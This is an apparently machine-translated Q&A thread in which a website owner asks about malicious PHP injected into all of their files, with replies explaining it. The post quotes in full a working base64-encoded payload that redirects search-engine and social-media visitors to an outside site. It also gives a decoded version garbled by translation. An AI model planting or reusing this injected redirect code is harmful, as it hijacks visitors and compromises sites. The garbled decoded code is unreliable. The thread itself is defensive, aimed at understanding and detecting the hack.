這2月14日我的網站得到由谷歌的二月二十九日,但所有PHP文件都與惡意代碼的檢查得到了實現行動後,來到我的注意一些惡意代碼的攻擊我得到了下面的代碼我從這個惡意代碼中遺失了多少?
呼應 BASE64_DECODE(「DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmV mZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9" );
上解碼它成爲
的error_reporting(0); $ qazplm = headers_sent();如果(!$ qazplm){$ referer = $ _SERVER ['HTTP_REFERER']; $ uag = $ _SERVER ['HTTP_USER_AGENT']; ($ uag)if(stristr($ referer,「yahoo」)或stristr($ referer,「bing」)或stristr($ referer,「漫遊者」)或stristr($ referer,「gogo」)或($ referer,「live.com」)或者stristr($ referer,「aport」)或者 stristr($ referer,「nigma」)或者stristr($ referer,「webalta」)或者 stristr($ referer, 「或」stristr「($ referer,」stumbleupon.com「) 或stristr($ referer,」bit.ly「)或stristr($ referer,」tinyurl.com「)或 preg_match(」/ yandex .ru/yandsearch \?(。*?)\ & lr \ = /「,$ referer)或 preg_match(」/ google.(。*?)/ url /「,$ referer)或stristr($ referer, 「myspace.com」)或stristr($ referer,「facebook.com」)或 stristr($ referer,「aol.com」)){如果(!stristr($ referer,「cache」)或!stristr($ referer,「inurl」))header(「Location:http://namesti.bee.pl/」); exit(); }} }}
我不知道它是怎麼來到我的服務器,但所有的PHP文件已經得到了實現,但其他人fine.entire網站是下來了。我只是想知道它可以做多少傷害以及這段代碼究竟做了什麼。我如何檢測它。它是在特定時間執行的腳本嗎?
如果引用者是搜索引擎和社交網站的列表,則此代碼將302重定向到此名稱網站。有效地是一個DoS。掃描您的所有PHP的'base64_decode'。然而,主要問題是黑客是如何發生的。這只是一個標準的「我如何鎖定一個PHP網站」Q. – TerryE 2012-03-03 12:37:07
啊,老基地64次襲擊,它發生在很多人身上,包括我的一個朋友,但是傷害並不是太嚴重,因爲它是由機器人而不是人類完成的。 – Zoidberg 2012-03-03 12:38:50
此鏈接可能有助於http://www.thonky.com/how-to/prevent-base-64-decode-hack/ – Zoidberg 2012-03-03 12:39:29